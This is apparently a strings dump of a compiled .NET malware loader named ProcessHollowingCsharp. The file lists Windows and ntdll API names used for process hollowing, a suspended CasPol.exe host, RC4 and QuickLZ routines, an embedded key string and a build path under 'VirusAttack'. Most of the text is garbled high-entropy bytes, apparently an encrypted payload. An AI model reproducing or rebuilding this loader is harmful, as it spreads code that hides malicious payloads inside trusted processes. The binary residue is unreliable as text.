!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
QLZ_POINTERS_1
cbReserved2
lpReserved2
QLZ_POINTERS_3
<Module>
CREATE_SUSPENDED
UNCOMPRESSED_END
SW_HIDE
QLZ_MEMORY_SAFE
IMAGE_DOS_SIGNATURE
IMAGE_NT_SIGNATURE
PAGE_EXECUTE_READWRITE
MEM_RESERVE
CONTEXT_FULL
PrivateKeyM
UNCONDITIONAL_MATCHLEN
DEFAULT_HEADERLEN
CWORD_LEN
QLZ_VERSION_REVISION
STARTUPINFO
System.IO
QLZ_STREAMING_BUFFER
QLZ_VERSION_MAJOR
QLZ_VERSION_MINOR
STARTF_USESTDHANDLES
HASH_VALUES
MINOFFSET
MEM_COMMIT
GenerateIV
STARTF_USESHOWWINDOW
SW_SHOW
SafeQuickLZ
mscorlib
Generate_Enc_Dec
RC4EncDec
NtResumeThread
hThread
NtGetContextThread
NtSetContextThread
SizeCompressed
sizeCompressed
SizeDecompressed
sizeDecompressed
lpReserved
source
pImage
abIV_Table
compressible
pHandle
lpTitle
lpApplicationName
lpCommandLine
ValueType
flAllocationType
FastWrite
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ProcessHollowingCsharp.exe
ProcessHollowingCsharp.cliqiba_r.exe
dwXSize
dwYSize
dwSize
System.Runtime.Versioning
String
get_Length
nBlockLength
HeaderLength
RC4Initial
kernel32.dll
ntdll.dll
GetManifestResourceStream
Program
System
lpNumberOfBytesWritten
abPlain
System.Reflection
ArgumentException
lpStartupInfo
lpProcessInfo
lpDesktop
ProcessHollowingCsharp
dwMemoryAddr
WriteHeader
exeBuffer
lpBuffer
hStdError
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
bInheritHandles
lpThreadAttributes
lpProcessAttributes
numbytes
dwCreationFlags
dwFlags
get_Chars
dwXCountChars
dwYCountChars
CreateProcess
TerminateProcess
hProcess
hostProcess
lpBaseAddress
lpAddress
Compress
Decompress
Object
flProtect
VA2FileOffset
op_Explicit
lpEnvironment
uConst
hStdInput
hStdOutput
lpContext
wShowWindow
VirtualAllocEx
startIndex
GetUintFromBytearray
SetUintFromBytearray
GetUshortFromBytearray
strKey
GetExecutingAssembly
BlockCopy
NtWriteVirtualMemory
lpCurrentDirectory
WrapNonExceptionThrows
ProcessHollowingCsharp
Copyright
2022
$37b35cf4-e958-4b13-9dd9-1609a52c48fd
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
Y'Y]<j
(&jt@0
cc&hzL
b*B~*;qV%C7]
|*1P](
f-g^*"Ny
u+kKmQ^h
k1dNoB
O-IoXmh-
/8l"8;
i$K{6)
:D6q_)?
0{=w1-3
5Q+gaq
*]$DHS
u1Ri P
/94$CF
#i6Dw*
>c`Lx`
bU]x Q
G_Zrct
P684{T+
1Nk0F@
dL-M?S
%]u)tm
J/!$>$
gBeD}N
aUl((k
|dB'"A
aeN?<L
GN1CN:
[C6W<I
g"(OBA
LBFbQ.!
Jtk c)
B08B<`*i
/??<[X
$42^kO
W8&J;,$
?)ar3T
G,l&1@
&>h<+R
Ok0P>:
|@N4Y4
HH-d\}V=/"
lKZ-ij
!xI8}t
UrpJ"y
Jk`+Kw_
q![L|)g
Ym\g?N8
+,3Edg
hrH*\+
=o=wvx
[9xj/8{
,CN]VL
ndxC7tl
oF$#WX
L%-cFt
LG=KB/
w1d\-3;
k U*w(
5*.&%I
|S^m&
_,}!s2
O~2`f@L
N# LV9
%9{=_tW
iwyP5?
G*'`pu
Zr=c<[A$
8|wtEB2
#%rYM"
=3=q>K;
kAe2S8+
|T"W$5
G<jlka
7'C;UX=
R](F;iE
ozk"B|
GWYgdz:
6*W8EG
mtd&r#
F"-u@d[c
?J!8V^
|FO;Bo
a}F"H5|
Ti62qO
}HK*>_
{J|y;^?
eQh@ $*
?]'j4U
q[ez ?`;~
<_Mmww)_
pc89bt
E;.BDA
;y-$%)`
Y.X ,Ka
=z'Nm*b(
c:xhu>j'
9s7%mU
1q54WX'h}M=
'iU= @^
+|r\c{
,+;;%T!
m6%}}}
Z!lNH*
SuO|c*n9
:k'^iU
_/Bjd}
$}?S(Y
?':76N
$d>zeK
dH81=&
CXDeEK
omv+OP
A3lX\x
*9Z4-EF6
}4p6Se
!9HSn"
M7+$R`
j(t'f#
"1X*<r
c_<CIg
{jdBX-
f}):]U
Y%V@jG
ry1yYQ*
$I|-q[
m 5r9$
e)6X*FK
[`4-=~.
ZR;qv^
Q:_4~Y
rFr@"\cn
b^-uS]
b}%Rr?W
=0"xYj
Y<$`Zh
B*/`gv
04.wNNi
Hakg9M
MV. tA
iA,ug2
-k)pYq
,&WeCv
)l8~s'u
I~R1WN
_H1l~C
uh8)L<
l,9X \
WdwD"1
t@|CJ!_
7mOdV6
k5)r)1d j
&?q\?"
\R4`Ox
) &Fwc
aBPA83D
D3CH.N
{u]C7E\<
t&Qv4y
JtJ//G
!24Z[4!
>&W%Od
gR]xmF
xi2 (d
3B! _o7
HF\.(j
F(@.]B
pnj}hO
QH_'/K:_
zW^p?3
r!LV]m
/[T$UH
U]|S|95
Ugr7tO
VXQ_Vd
|TTAbC
FxgRqPe
=B}P%$
-=ek`,M
46}CZ|
-Fm<I8C
"\;:n
{nIPc]H
j=r2qhG
Pp$PkX
Em MK{
W>1-VK
w#L;<~(>
L;|2(F
jo>k2/
}Mzqwi
I)_;&d
\V'XClx
u*ejde
xv`A2-A
%_p[58"
ZG_8QF
JxZ)oG#
[XP-rZ
mvYf`m
59V+:I
791KP\
b?+HjF
L{?Lsr>PW
@G1)~L
LnSy~(
%@)n|VM5
Gmjd>|
W@zKK2F?
~Xy=4|
V,w?<a
Lz#%O\?uo
n(P!L&
:l)U~%TW
K'`UbH1
t4NQPK
KaY?o
puiV`8
ei=|_@2
g[-WCo
%HJ22"
,\?CD!u
m_=49W
+h\Ol6
yEH_s`M_
S0R) m
FPZ4yj
ul#Lo)z
g$!5;(
-SjX Z
MQ218@
!1z8(g&
JQM="n
0-Bd!Y
0]YYvi
a xh/C
U9%7'@
l>W{_Kg,
NN.:geTQh
'J,p_c
X%TM5u
^L}Q^(
|gNDfn4
ud / Wi
DTfE+^l
?ScI&R
iUq50w
9<Airf+?D
8"Hn[S
up?KUr
Z2P?[$t~
)TUr/~&
W$vVyJgkLa
0a?XWG
-Dr~}!R
L`,K<y
Xcv;\bD)
+%bq%v
pU|xFh
ht-qUL
z9i5B4l
@ZZk\,B
@$N0u^L
f!,@'m
AdwCnt
cjm"5p
]75nV5I5
%}#A1X
mm D>:N
#[ypNM
A&bA%A
]A\+P1
JAoH{N
LQV}jN
mbb sE
cTC MCj
v E1@|
e&4-]a
xNB-Nk
W_/5[^
-<e1va
F9rG+x
$]8PSX
8y@ u[R
MNsxc7
<3Ar_[
=@EH~#r !
Bs1&[lK
8v4PSp
r#{>$:
E=US6_
K^`|ue
tICnfs
:DziG
)eXR?z
9""j/o
Q&"A%|'mq
HR4Y<-
nl/Gm_
7ZUP}2
XKZ}V:G
:9EG0
f'~E3lT
7$rPtV
jjLR{t
mEU>Qj\
(8G[bg
PF ^FZ
I`:z`|
5 3pqp
pyaNex
,<x;cI
argE4H
lp|mdT
>$(Qq:
-DbKte^z
KQD#Ev
%t}fvu
H/`;70
B3rVf9lg|
r>BT zVin
J!|7Lp@
Q\xcm7
4'Yv>rmZ
E 4\!4
2\ G(eZ8r
$DZ!^;QVn
x"x7U/8
d{vgkG
jGq2+p
o*VV}6
vh07<R(
sG-a/,
yhb-g6
TuG* X
^xZr`;
w^LqmM
Q<c|Pf
=npNg|
O/-fo`S
@bOXq5
)48 cg
n=[.=x
6Vn2)*
FOrQ&0|"E
*|8 nA
" G0+-j
9sV^F&V;d
O#[_/C
\Di#p3
?,9Dk4
cQ\pO$]t%
Iz9h-F
l-]1l*)
qd}l=vKk
~{obM>+f`3t
PeYffR
q"2}QH
DCw6pT
edY`-q8&
R]".}L
)3&h(33
sw57l=
L7tkr=
R4-N%)/
49Tfs/7l
Z$9I@
XU?q?:
NB9cOI
??A#T]
;3L^hfW#
l#_w|$
{0CiX3
SM|)%
J8B>~\ o
|6]o{hP
3f _`f
av"bl,
,Y+1x;~S8QB"7u
.2x!c
RY#]o.z\
Ny{5H]r
j4cbn9
`+-#\IF
m+U^r@
(U ]:~
(#e^][
Rzx5u*
f"w"JR
n~HFIt#
O:\work\VirusAttack\ProcessHollowingCsharp\ProcessHollowingCsharp\obj\x86\Release\ProcessHollowingCsharp.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
ProcessHollowingCsharp.cliqiba_r.exe
/3489-sd*f/-*g/fd*b/89fg8b2f-g/g-*fhk ynuy8,ui1,j@h62k9jfghj#+hj-f*hj/k9m45fh96f6%94h+9s7f4gh!s8/h/h-*-/j9j87*7hmn84ytmn7yt-ty*n*n/yrkjyulop*told*f-a/sdfs*io-lu*ilo*-i]*[-*opi[;l*uiliu;op'i*o-l-o*l;dfs+dfdgju* uk*iuds*d-fsdf+sdfsd+fhgt*ju*-o98o98-*p09*9*08;9*08lo8,*.*,.o.**,ertyhsrgh*-fgagfa+sfasqwfeffsdfsdfsdsvdvfvar/g*fvvw*-34*34g23g*45+erg+ga+dfgas+fag2hgadfgag*ag*-g*4g*45t56*h*65hggagargsgg-*dfgfdg*-fgfgfg+dgfdfgd*d*ga+f*a-sdf*sdf*-saAF2AFGSgfg*GDGGFbgddfgsgfdffdf+gdfgdgdg+dfgsdgsd+sdsgfa*-gs+ggf+ff+ffdg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
ProcessHollowingCsharp
FileVersion
1.0.0.0
InternalName
ProcessHollowingCsharp.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
ProcessHollowingCsharp.exe
ProductName
ProcessHollowingCsharp
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0